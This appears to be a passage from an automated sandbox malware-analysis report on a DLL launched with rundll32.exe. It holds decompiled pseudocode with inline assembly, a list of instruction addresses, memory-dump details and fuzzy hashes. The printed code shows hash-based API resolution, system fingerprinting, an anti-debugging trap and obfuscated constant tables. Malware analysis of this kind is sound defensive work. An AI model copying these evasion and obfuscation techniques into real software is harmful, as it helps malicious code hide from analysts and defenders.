				 *((intOrPtr*)( &_v100 + 0x10)) = 0x9a85f5ac;
				asm("movq [ecx+0x18], xmm0");
				L6E8BF4F0();
				_push(0x10);
				L6E8BF84C();
				L6E8BF4F0();
				_push(0x10);
				L6E8BF4E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v112 = _v112 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v108 + 0x10)) = 0x93251419;
				asm("movq [ecx+0x18], xmm0");
				L6E8BF4F0();
				_push(0x10);
				L6E8BF84C();
				L6E8BF4F0();
				_push(0x10);
				L6E8BF4E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v120 = _v120 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v116 + 0x10)) = 0x26dec0d0;
				asm("movq [ecx+0x18], xmm0");
				L6E8BF4F0();
				_push(0x10);
				L6E8BF84C();
				L6E8BF4F0();
				_push(0x10);
				L6E8BF4E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v128 = _v128 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v124 + 0x10)) = 0xa7a69cc6;
				asm("movq [ecx+0x18], xmm0");
				L6E8BF4F0();
				_push(0x10);
				L6E8BF84C();
				L6E8BF4F0();
				_push(0x10);
				L6E8BF4E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v136 = _v136 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v132 + 0x10)) = 0x1a9c1df5;
				asm("movq [ecx+0x18], xmm0");
				L6E8BF4F0();
				_push(0x10);
				L6E8BF84C();
				L6E8BF4F0();
				_push(0x10);
				L6E8BF4E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v144 = _v144 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v140 + 0x10)) = 0x77fa1d17;
				asm("movq [ecx+0x18], xmm0");
				L6E8BF4F0();
				_push(0x10);
				L6E8BF84C();
				L6E8BF4F0();
				_push(0x10);
				L6E8BF4E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v152 = _v152 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v148 + 0x10)) = 0xabb27594;
				asm("movq [ecx+0x18], xmm0");
				L6E8BF4F0();
				_push(0x10);
				L6E8BF84C();
				L6E8BF4F0();
				_push(0x10);
				L6E8BF4E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v160 = _v160 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v156 + 0x10)) = 0xfe904c4d;
				asm("movq [ecx+0x18], xmm0");
				L6E8BF4F0();
				_push(0x10);
				L6E8BF84C();
				L6E8BF4F0();
				_push(0x10);
				L6E8BF4E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v168 = _v168 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v164 + 0x10)) = 0xde72067;
				asm("movq [ecx+0x18], xmm0");
				L6E8BF4F0();
				_push(0x10);
				L6E8BF84C();
				L6E8BF4F0();
				_push(0x10);
				L6E8BF4E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v176 = _v176 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v172 + 0x10)) = 0x82fffbdc;
				asm("movq [ecx+0x18], xmm0");
				L6E8BF4F0();
				_push(0x10);
				L6E8BF84C();
				L6E8BF4F0();
				_push(0x10);
				L6E8BF4E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v184 = _v184 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v180 + 0x10)) = 0xdb278333;
				asm("movq [ecx+0x18], xmm0");
				L6E8BF4F0();
				_push(0x10);
				L6E8BF84C();
				L6E8BF4F0();
				_push(0x10);
				L6E8BF4E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v192 = _v192 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v188 + 0x10)) = 0xc380629b;
				asm("movq [ecx+0x18], xmm0");
				L6E8BF4F0();
				_push(0x10);
				L6E8BF84C();
				L6E8BF4F0();
				_push(0x10);
				L6E8BF4E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v200 = _v200 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v196 + 0x10)) = 0xd5e26663;
				asm("movq [ecx+0x18], xmm0");
				L6E8BF4F0();
				_push(0x10);
				L6E8BF84C();
				L6E8BF4F0();
				_push(0x10);
				L6E8BF4E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v208 = _v208 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v204 + 0x10)) = 0xc09bf2f8;
				asm("movq [ecx+0x18], xmm0");
				L6E8BF4F0();
				_push(0x10);
				L6E8BF84C();
				L6E8BF4F0();
				_push(0x10);
				L6E8BF4E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t322 = _t368;
				 *_t322 =  *_t322 + 1;
				L6E8C41D8();
				_push(0x10);
				L6E8BF4E0();
				_push(0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x450], xmm0");
				L6E8BF4E0();
				_push(0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x458], xmm0");
				L6E8BF4E0();
				_push(0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x460], xmm0");
				L6E8BF4E0();
				_push(0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x468], xmm0");
				L6E8BF4E0();
				_push(0x60);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x470], xmm0");
				L6E8BF4E0();
				_push(0x70);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x478], xmm0");
				L6E8BF4E0();
				_push(0x80);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x480], xmm0");
				L6E8BF4E0();
				_push(0x90);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x488], xmm0");
				L6E8BF4E0();
				_push(0xa0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x490], xmm0");
				L6E8BF4E0();
				_push(0xb0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x498], xmm0");
				L6E8BF4E0();
				_push(0xc0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a0], xmm0");
				L6E8BF4E0();
				_push(0xd0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a8], xmm0");
				L6E8BF4E0();
				_push(0xe0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b0], xmm0");
				L6E8BF4E0();
				_push(0xf0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b8], xmm0");
				L6E8BF4E0();
				_push(0x100);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c0], xmm0");
				L6E8BF4E0();
				_push(0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c8], xmm0");
				L6E8BF4E0();
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp], xmm0");
				_t196 = E6E8B1D2C(_v248, 0, 0x10);
				_v252 = _t196;
				_t206 = _t322;
				_push(_t206);
				_push(_v252);
				L6E8BB2C0();
				L6E8BF864();
				_v300 = 0;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v296 + 0x10)) = 0xa09bf9c8;
				asm("movq [ecx+0x18], xmm0");
				L6E8BF4F0();
				_t197 = _t196 + 0x10;
				_push(_t197);
				L6E8BF84C();
				L6E8BF4F0();
				_t198 = _t197 + 0xfffffff0;
				_push(_t198);
				L6E8BF4E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v308 = _v308 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v304 + 0x10)) = 0x2b5b930c;
				asm("movq [ecx+0x18], xmm0");
				L6E8BF4F0();
				_t199 = _t198 + 0x10;
				_push(_t199);
				L6E8BF84C();
				L6E8BF4F0();
				_t200 = _t199 + 0xfffffff0;
				_push(_t200);
				L6E8BF4E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v316 = _v316 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v312 + 0x10)) = 0x453267ca;
				asm("movq [ecx+0x18], xmm0");
				L6E8BF4F0();
				_t201 = _t200 + 0x10;
				_push(_t201);
				L6E8BF84C();
				L6E8BF4F0();
				_t202 = _t201 + 0xfffffff0;
				_push(_t202);
				L6E8BF4E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v324 = _v324 + 1;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v320 + 0x10)) = 0xb38fc5b8;
				asm("movq [ecx+0x18], xmm0");
				L6E8BF4F0();
				_t203 = _t202 + 0x10;
				_push(_t203);
				L6E8BF84C();
				L6E8BF4F0();
				_push(_t203 + 0xfffffff0);
				L6E8BF4E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t368 =  *_t368 + 1;
				_t205 = _t368;
				_push(_t205);
				_push(_t206);
				_push(_v292);
				L6E8BBA40();
				_push(0);
				L6E8BF4E0();
				_push(0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d8], xmm0");
				L6E8BF4E0();
				_push(0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e0], xmm0");
				L6E8BF4E0();
				_push(0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d0], xmm0");
				L6E8BF4E0();
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e8], xmm0");
				L6E8BF678();
				L6E8BF678();
				return _t205;
			}

0x6e8b1498
0x6e8b149d
0x6e8b14a3
0x6e8b14a6
0x6e8b14ab
0x6e8b14b0
0x6e8b14bc
0x6e8b14c0
0x6e8b14c5
0x6e8b14cd
0x6e8b14d2
0x6e8b14db
0x6e8b14e3
0x6e8b14e8
0x6e8b14f3
0x6e8b14f4
0x6e8b14f5
0x6e8b14f6
0x6e8b14f7
0x6e8b14fe
0x6e8b1502
0x6e8b1509
0x6e8b150e
0x6e8b1516
0x6e8b151b
0x6e8b1524
0x6e8b152c
0x6e8b1531
0x6e8b153c
0x6e8b153d
0x6e8b153e
0x6e8b153f
0x6e8b1540
0x6e8b1547
0x6e8b154b
0x6e8b1552
0x6e8b1557
0x6e8b155f
0x6e8b1564
0x6e8b156d
0x6e8b1575
0x6e8b157a
0x6e8b1585
0x6e8b1586
0x6e8b1587
0x6e8b1588
0x6e8b1589
0x6e8b1590
0x6e8b1594
0x6e8b159b
0x6e8b15a0
0x6e8b15a8
0x6e8b15ad
0x6e8b15b6
0x6e8b15be
0x6e8b15c3
0x6e8b15ce
0x6e8b15cf
0x6e8b15d0
0x6e8b15d1
0x6e8b15d2
0x6e8b15d9
0x6e8b15dd
0x6e8b15e4
0x6e8b15e9
0x6e8b15f1
0x6e8b15f6
0x6e8b15ff
0x6e8b1607
0x6e8b160c
0x6e8b1617
0x6e8b1618
0x6e8b1619
0x6e8b161a
0x6e8b161b
0x6e8b1622
0x6e8b1626
0x6e8b162d
0x6e8b1632
0x6e8b163a
0x6e8b163f
0x6e8b1648
0x6e8b1650
0x6e8b1655
0x6e8b1660
0x6e8b1661
0x6e8b1662
0x6e8b1663
0x6e8b1664
0x6e8b166b
0x6e8b166f
0x6e8b1676
0x6e8b167b
0x6e8b1683
0x6e8b1688
0x6e8b1691
0x6e8b1699
0x6e8b169e
0x6e8b16a9
0x6e8b16aa
0x6e8b16ab
0x6e8b16ac
0x6e8b16ad
0x6e8b16b4
0x6e8b16b8
0x6e8b16bf
0x6e8b16c4
0x6e8b16cc
0x6e8b16d1
0x6e8b16da
0x6e8b16e2
0x6e8b16e7
0x6e8b16f2
0x6e8b16f3
0x6e8b16f4
0x6e8b16f5
0x6e8b16f6
0x6e8b16fd
0x6e8b1701
0x6e8b1708
0x6e8b170d
0x6e8b1715
0x6e8b171a
0x6e8b1723
0x6e8b172b
0x6e8b1730
0x6e8b173b
0x6e8b173c
0x6e8b173d
0x6e8b173e
0x6e8b173f
0x6e8b1746
0x6e8b174a
0x6e8b1751
0x6e8b1756
0x6e8b175e
0x6e8b1763
0x6e8b176c
0x6e8b1774
0x6e8b1779
0x6e8b1784
0x6e8b1785
0x6e8b1786
0x6e8b1787
0x6e8b1788
0x6e8b178f
0x6e8b1793
0x6e8b179a
0x6e8b179f
0x6e8b17a7
0x6e8b17ac
0x6e8b17b5
0x6e8b17bd
0x6e8b17c2
0x6e8b17cd
0x6e8b17ce
0x6e8b17cf
0x6e8b17d0
0x6e8b17d1
0x6e8b17d8
0x6e8b17dc
0x6e8b17e3
0x6e8b17e8
0x6e8b17f0
0x6e8b17f5
0x6e8b17fe
0x6e8b1806
0x6e8b180b
0x6e8b1816
0x6e8b1817
0x6e8b1818
0x6e8b1819
0x6e8b181a
0x6e8b1821
0x6e8b1825
0x6e8b182c
0x6e8b1831
0x6e8b1839
0x6e8b183e
0x6e8b1847
0x6e8b184f
0x6e8b1854
0x6e8b185f
0x6e8b1860
0x6e8b1861
0x6e8b1862
0x6e8b1863
0x6e8b186a
0x6e8b186e
0x6e8b1875
0x6e8b187a
0x6e8b1882
0x6e8b1887
0x6e8b1890
0x6e8b1898
0x6e8b189d
0x6e8b18a8
0x6e8b18a9
0x6e8b18aa
0x6e8b18ab
0x6e8b18ac
0x6e8b18b3
0x6e8b18b7
0x6e8b18be
0x6e8b18c3
0x6e8b18cb
0x6e8b18d0
0x6e8b18d9
0x6e8b18e1
0x6e8b18e6
0x6e8b18f1
0x6e8b18f2
0x6e8b18f3
0x6e8b18f4
0x6e8b18f5
0x6e8b18fc
0x6e8b1900
0x6e8b1907
0x6e8b190c
0x6e8b1914
0x6e8b1919
0x6e8b1922
0x6e8b192a
0x6e8b192f
0x6e8b193a
0x6e8b193b
0x6e8b193c
0x6e8b193d
0x6e8b193e
0x6e8b1945
0x6e8b1949
0x6e8b1950
0x6e8b1955
0x6e8b195d
0x6e8b1962
0x6e8b196b
0x6e8b1973
0x6e8b1978
0x6e8b1983
0x6e8b1984
0x6e8b1985
0x6e8b1986
0x6e8b198c
0x6e8b198f
0x6e8b1991
0x6e8b1996
0x6e8b199c
0x6e8b19a1
0x6e8b19a3
0x6e8b19ac
0x6e8b19b4
0x6e8b19b9
0x6e8b19bb
0x6e8b19c4
0x6e8b19cc
0x6e8b19d1
0x6e8b19d3
0x6e8b19dc
0x6e8b19e4
0x6e8b19e9
0x6e8b19eb
0x6e8b19f4
0x6e8b19fc
0x6e8b1a01
0x6e8b1a03
0x6e8b1a0c
0x6e8b1a14
0x6e8b1a19
0x6e8b1a1b
0x6e8b1a24
0x6e8b1a2c
0x6e8b1a31
0x6e8b1a36
0x6e8b1a3f
0x6e8b1a47
0x6e8b1a4c
0x6e8b1a51
0x6e8b1a5a
0x6e8b1a62
0x6e8b1a67
0x6e8b1a6c
0x6e8b1a75
0x6e8b1a7d
0x6e8b1a82
0x6e8b1a87
0x6e8b1a90
0x6e8b1a98
0x6e8b1a9d
0x6e8b1aa2
0x6e8b1aab
0x6e8b1ab3
0x6e8b1ab8
0x6e8b1abd
0x6e8b1ac6
0x6e8b1ace
0x6e8b1ad3
0x6e8b1ad8
0x6e8b1ae1
0x6e8b1ae9
0x6e8b1aee
0x6e8b1af3
0x6e8b1afc
0x6e8b1b04
0x6e8b1b09
0x6e8b1b0e
0x6e8b1b17
0x6e8b1b1f
0x6e8b1b24
0x6e8b1b26
0x6e8b1b2f
0x6e8b1b37
0x6e8b1b3e
0x6e8b1b43
0x6e8b1b4c
0x6e8b1b51
0x6e8b1b55
0x6e8b1b57
0x6e8b1b58
0x6e8b1b64
0x6e8b1b6d
0x6e8b1b72
0x6e8b1b7d
0x6e8b1b81
0x6e8b1b88
0x6e8b1b8d
0x6e8b1b92
0x6e8b1b95
0x6e8b1b9a
0x6e8b1ba3
0x6e8b1ba8
0x6e8b1bab
0x6e8b1bb0
0x6e8b1bbb
0x6e8b1bbc
0x6e8b1bbd
0x6e8b1bbe
0x6e8b1bbf
0x6e8b1bc6
0x6e8b1bca
0x6e8b1bd1
0x6e8b1bd6
0x6e8b1bdb
0x6e8b1bde
0x6e8b1be3
0x6e8b1bec
0x6e8b1bf1
0x6e8b1bf4
0x6e8b1bf9
0x6e8b1c04
0x6e8b1c05
0x6e8b1c06
0x6e8b1c07
0x6e8b1c08
0x6e8b1c0f
0x6e8b1c13
0x6e8b1c1a
0x6e8b1c1f
0x6e8b1c24
0x6e8b1c27
0x6e8b1c2c
0x6e8b1c35
0x6e8b1c3a
0x6e8b1c3d
0x6e8b1c42
0x6e8b1c4d
0x6e8b1c4e
0x6e8b1c4f
0x6e8b1c50
0x6e8b1c51
0x6e8b1c58
0x6e8b1c5c
0x6e8b1c63
0x6e8b1c68
0x6e8b1c6d
0x6e8b1c70
0x6e8b1c75
0x6e8b1c7e
0x6e8b1c86
0x6e8b1c8b
0x6e8b1c96
0x6e8b1c97
0x6e8b1c98
0x6e8b1c99
0x6e8b1c9a
0x6e8b1c9d
0x6e8b1ca0
0x6e8b1ca1
0x6e8b1ca2
0x6e8b1cac
0x6e8b1cb1
0x6e8b1cb7
0x6e8b1cbc
0x6e8b1cbe
0x6e8b1cc7
0x6e8b1ccf
0x6e8b1cd4
0x6e8b1cd6
0x6e8b1cdf
0x6e8b1ce7
0x6e8b1cec
0x6e8b1cee
0x6e8b1cf7
0x6e8b1cff
0x6e8b1d04
0x6e8b1d0d
0x6e8b1d15
0x6e8b1d1e
0x6e8b1d2a

Strings

g , xrefs: 6E8B17DC

Memory Dump Source

Source File: 00000001.00000002.741798564.000000006E8B1000.00000020.00020000.sdmp, Offset: 6E8B0000, based on PE: true

Associated: 00000001.00000002.741344584.000000006E8B0000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: g
API String ID: 0-171373902
Opcode ID: 30ae7e6146e986a7ac56c14d56f12eff19a0cc668b72aa97313e7cf53793b404
Instruction ID: 5408c5c649ca7e94e5d97763058813e430ef0b5bc8c6dd96b6ab337570f59aa0
Opcode Fuzzy Hash: 30ae7e6146e986a7ac56c14d56f12eff19a0cc668b72aa97313e7cf53793b404
Instruction Fuzzy Hash: 823291764046059BC715DF68CD51AEFB3A8AFB230CF204F0DB4996E2A1EF71A985CA41

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6404 Parent PID: 3248 rundll32.exeCOMMON

Executed Functions

Function 6E8C0754, Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 650
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E6E8C0754(void* __ecx) {
				void* __esi;
				intOrPtr _t155;
				signed char* _t159;
				char _t162;
				void* _t180;
				intOrPtr _t189;
				char _t190;
				intOrPtr _t196;
				intOrPtr _t200;
				void* _t203;
				void* _t212;
				void* _t213;
				void* _t215;
				void* _t216;
				void* _t223;
				void* _t238;
				void* _t241;
				void* _t244;
				void* _t247;
				void* _t250;
				void* _t254;
				void* _t259;
				void* _t265;
				void* _t268;
				int _t271;
				void* _t272;
				void* _t276;
				void* _t277;
				void* _t278;
				void* _t282;
				int _t288;
				intOrPtr* _t291;
				signed char _t294;
				signed char _t295;
				intOrPtr* _t320;
				intOrPtr* _t325;
				intOrPtr* _t363;
				char _t364;
				intOrPtr* _t372;
				void* _t377;
				void* _t382;
				void* _t383;
				void* _t384;
				void* _t385;
				void* _t386;
				void* _t387;
				void* _t393;
				void* _t395;
				void* _t401;
				void* _t403;
				intOrPtr* _t404;
				signed int _t406;
				intOrPtr* _t409;
				void* _t411;
				signed int _t413;
				void* _t414;
				void* _t415;
				void* _t420;
				intOrPtr* _t423;
				void* _t425;
				void** _t427;
				void* _t428;
				void* _t429;

				_t414 = __ecx;
				_t155 =  *0x6e8cd1f8;
				if(_t155 == 0x255be0d1) {
					_t155 = E6E8C35F4(0x30);
					 *0x6e8cd1f8 = _t155;
				}
				if( *((char*)(_t155 + 0xb)) == 0 || _t414 != 0) {
					_t415 = _t428 + 0x48;
					E6E8C3670(_t415, 0, 0x11c);
					_t429 = _t428 + 0xc;
					 *((intOrPtr*)(_t429 + 0x48)) = 0x11c;
					if(E6E8C3044(0x10154545, 0x51a0195c, 0x10154545, 0x10154545) != 0) {
						_push(_t415);
						asm("int3");
						asm("int3");
					}
					_t404 =  *0x6e8cd1f8;
					_t159 = _t429 + 0x4c;
					_t294 =  *_t159;
					 *(_t404 + 8) = _t294;
					_t295 = _t159[4];
					 *(_t404 + 9) = _t295;
					 *((char*)(_t404 + 0xa)) = _t159[0x110];
					 *((intOrPtr*)(_t404 + 4)) =  *((intOrPtr*)(_t429 + 0x54));
					 *((char*)(_t404 + 0xc)) = 0 | _t159[0x116] != 0x00000001;
					 *_t404 = (_t295 & 0x000000ff) + ((_t294 & 0x000000ff) << 4) - 0x50;
					_t162 = E6E8C101C(_t404);
					 *(_t429 + 0x198) = 0;
					 *((char*)( *0x6e8cd1f8 + 0xb)) = _t162;
					_t363 = E6E8C3044(0x8b9d0da7, 0x8335dc52, _t162, _t162);
					if(_t363 == 0) {
						L12:
						_t364 = 0;
						L13:
						 *((char*)( *0x6e8cd1f8 + 0x28)) = _t364;
						if( *((intOrPtr*)(E6E8C0754(0))) >= 0x10) {
							_push(6);
							memcpy(_t429 + 0x164, 0x6e8cbce0, 0 << 2);
							_t429 = _t429 + 0xc;
							 *((intOrPtr*)(_t429 + 0x1c)) = 0;
							E6E8BF5A8(_t429 + 0x24, 0);
							_t406 = 0;
							__eflags = 0;
							do {
								E6E8BF84C(_t429 + 0x24, E6E8BF4F0(_t429 + 0x20) + 4);
								 *((intOrPtr*)(E6E8BF4E0(_t429 + 0x24, E6E8BF4F0(_t429 + 0x20) + 0xfffffffc))) =  *((intOrPtr*)(_t429 + 0x164 + _t406 * 4));
								_t406 = _t406 + 1;
								 *((intOrPtr*)(_t429 + 0x1c)) =  *((intOrPtr*)(_t429 + 0x1c)) + 1;
								__eflags = _t406 - 6;
							} while (_t406 < 6);
							_push(0);
							E6E8C5558(_t429 + 0xc, _t429 + 0x1c, 0x80000002);
							E6E8BF678(_t429 + 0x20);
							E6E8C5588(_t429 + 8, _t429 + 0x1c0, 0x5e9822cf);
							_t180 = E6E8C583C(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c0)));
							_t407 = _t180;
							E6E8BDFDC(_t429 + 0x1c0);
							__eflags = _t180;
							if(_t180 != 0) {
								E6E8C5588(_t429 + 8, _t429 + 0x1c8, 0x80c4a2b7);
								_t420 = E6E8C583C(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c8)));
								E6E8BDFDC(_t429 + 0x1c8);
								_t407 = _t429 + 0x1d0;
								E6E8C5588(_t429 + 8, _t429 + 0x1d0, 0xa89c042f);
								_t401 = E6E8C583C(_t429 + 4, __eflags,  *(_t429 + 0x1d0));
								E6E8BDFDC(_t429 + 0x1d0);
								__eflags = _t420;
								if(_t420 != 0) {
									__eflags = _t420 - 5;
									if(_t420 != 5) {
										__eflags = _t420 - 2;
										if(_t420 != 2) {
											L58:
											E6E8BD020(_t429 + 0xc);
											__eflags =  *((char*)(_t429 + 8));
											if( *((char*)(_t429 + 8)) == 0) {
												L65:
												_t189 = 0;
												__eflags = 0;
												 *(_t429 + 4) = 0;
												goto L66;
											}
											_t382 =  *(_t429 + 4);
											__eflags = _t382;
											if(_t382 == 0) {
												L61:
												_t238 = 1;
												L63:
												__eflags = _t238;
												if(_t238 == 0) {
													E6E8C5530(_t382);
												}
												goto L65;
											}
											__eflags = _t382 - 0xffffffff;
											if(_t382 != 0xffffffff) {
												_t238 = 0;
												__eflags = 0;
												goto L63;
											}
											goto L61;
										}
										__eflags = _t401 - 1;
										if(_t401 != 1) {
											goto L58;
										}
										E6E8BD020(_t429 + 0xc);
										__eflags =  *((char*)(_t429 + 8));
										if( *((char*)(_t429 + 8)) == 0) {
											L57:
											 *(_t429 + 4) = 0;
											_t189 = 5;
											goto L66;
										}
										_t383 =  *(_t429 + 4);
										__eflags = _t383;
										if(_t383 == 0) {
											L53:
											_t241 = 1;
											L55:
											__eflags = _t241;
											if(_t241 == 0) {
												E6E8C5530(_t383);
											}
											goto L57;
										}
										__eflags = _t383 - 0xffffffff;
										if(_t383 != 0xffffffff) {
											_t241 = 0;
											__eflags = 0;
											goto L55;
										}
										goto L53;
									}
									__eflags = _t401;
									if(_t401 != 0) {
										__eflags = _t401 - 1;
										if(_t401 == 1) {
											E6E8BD020(_t429 + 0xc);
											__eflags =  *((char*)(_t429 + 8));
											if( *((char*)(_t429 + 8)) == 0) {
												L121:
												 *(_t429 + 4) = 0;
												_t189 = 4;
												goto L66;
											}
											_t384 =  *(_t429 + 4);
											__eflags = _t384;
											if(_t384 == 0) {
												L117:
												_t244 = 1;
												L119:
												__eflags = _t244;
												if(_t244 == 0) {
													E6E8C5530(_t384);
												}
												goto L121;
											}
											__eflags = _t384 - 0xffffffff;
											if(_t384 != 0xffffffff) {
												_t244 = 0;
												__eflags = 0;
												goto L119;
											}
											goto L117;
										}
										goto L58;
									}
									E6E8BD020(_t429 + 0xc);
									__eflags =  *((char*)(_t429 + 8));
									if( *((char*)(_t429 + 8)) == 0) {
										L45:
										 *(_t429 + 4) = 0;
										_t189 = 3;
										goto L66;
									}
									_t385 =  *(_t429 + 4);
									__eflags = _t385;
									if(_t385 == 0) {
										L41:
										_t247 = 1;
										L43:
										__eflags = _t247;
										if(_t247 == 0) {
											E6E8C5530(_t385);
										}
										goto L45;
									}
									__eflags = _t385 - 0xffffffff;
									if(_t385 != 0xffffffff) {
										_t247 = 0;
										__eflags = 0;
										goto L43;
									}
									goto L41;
								}
								__eflags = _t401;
								if(_t401 != 0) {
									goto L58;
								}
								E6E8BD020(_t429 + 0xc);
								__eflags =  *((char*)(_t429 + 8));
								if( *((char*)(_t429 + 8)) == 0) {
									L35:
									 *(_t429 + 4) = 0;
									_t189 = 2;
									goto L66;
								}
								_t386 =  *(_t429 + 4);
								__eflags = _t386;
								if(_t386 == 0) {
									L31:
									_t250 = 1;
									L33:
									__eflags = _t250;
									if(_t250 == 0) {
										E6E8C5530(_t386);
									}
									goto L35;
								}
								__eflags = _t386 - 0xffffffff;
								if(_t386 != 0xffffffff) {
									_t250 = 0;
									__eflags = 0;
									goto L33;
								}
								goto L31;
							}
							E6E8BD020(_t429 + 0xc);
							__eflags =  *((char*)(_t429 + 8));
							if( *((char*)(_t429 + 8)) == 0) {
								L25:
								 *(_t429 + 4) = 0;
								_t189 = 1;
								goto L66;
							}
							_t387 =  *(_t429 + 4);
							__eflags = _t387;
							if(_t387 == 0) {
								L21:
								_t254 = 1;
								L23:
								__eflags = _t254;
								if(_t254 == 0) {
									E6E8C5530(_t387);
								}
								goto L25;
							}
							__eflags = _t387 - 0xffffffff;
							if(_t387 != 0xffffffff) {
								_t254 = 0;
								__eflags = 0;
								goto L23;
							}
							goto L21;
						} else {
							_t189 = 1;
							L66:
							 *((intOrPtr*)( *0x6e8cd1f8 + 0x24)) = _t189;
							_t190 = E6E8C1054(0xffffffffffffffff);
							_t320 =  *0x6e8cd1f8;
							 *((char*)(_t320 + 0x29)) = _t190;
							 *((intOrPtr*)(_t320 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
							if( *_t320 >= 0x10) {
								__eflags = 0xffffffffffffffff;
								 *((intOrPtr*)( *0x6e8cd1f8 + 0x2c)) = E6E8C10C8(0xffffffffffffffff);
								L78:
								if(E6E8C3044(0x10154545, 0xccc77b1, 0x10154545, 0x10154545) != 0) {
									GetSystemInfo(_t429 + 0x164); // executed
								}
								_t196 =  *0x6e8cd1f8;
								_t291 = _t429 + 0x178;
								_t409 = _t429 + 0x170;
								 *((short*)(_t196 + 0xe)) =  *_t291;
								 *((intOrPtr*)(_t196 + 0x10)) =  *((intOrPtr*)(_t291 - 0x10));
								 *((intOrPtr*)(_t196 + 0x14)) =  *((intOrPtr*)(_t291 - 0xc));
								 *((intOrPtr*)(_t196 + 0x18)) =  *_t409;
								 *((intOrPtr*)(_t196 + 0x1c)) =  *((intOrPtr*)(_t409 + 0x10));
								return _t196;
							}
							 *(_t429 + 0x19c) = 0;
							_t372 = E6E8C3044(0x8b9d0da7, 0x8335dc52, 0x8b9d0da7, 0x8b9d0da7);
							if(_t372 == 0) {
								L74:
								_t200 =  *0x6e8cd1f8;
								if( *((char*)(_t200 + 0x28)) == 0) {
									 *((intOrPtr*)(_t200 + 0x2c)) = 3;
								} else {
									 *((intOrPtr*)(_t200 + 0x2c)) = 5;
								}
								goto L78;
							}
							_push(_t429 + 0x19c);
							_push(8);
							_push(0xffffffff);
							if( *_t372() == 0) {
								_t203 = E6E8C35C8(_t407);
								__eflags = _t203;
								if(_t203 != 0) {
									goto L74;
								}
							}
							 *(_t429 + 0x30) =  *(_t429 + 0x19c);
							 *((char*)(_t429 + 0x34)) = 1;
							 *(_t429 + 0x1a4) = 0;
							_t325 = E6E8C3044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7);
							if(_t325 != 0) {
								_push(_t429 + 0x1a4);
								_push(0);
								_push(0);
								_push(1);
